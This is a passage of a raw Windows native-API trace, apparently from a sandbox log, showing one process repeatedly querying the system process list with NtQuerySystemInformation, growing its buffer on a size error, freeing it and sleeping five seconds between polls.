[0281.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.345] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.474] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 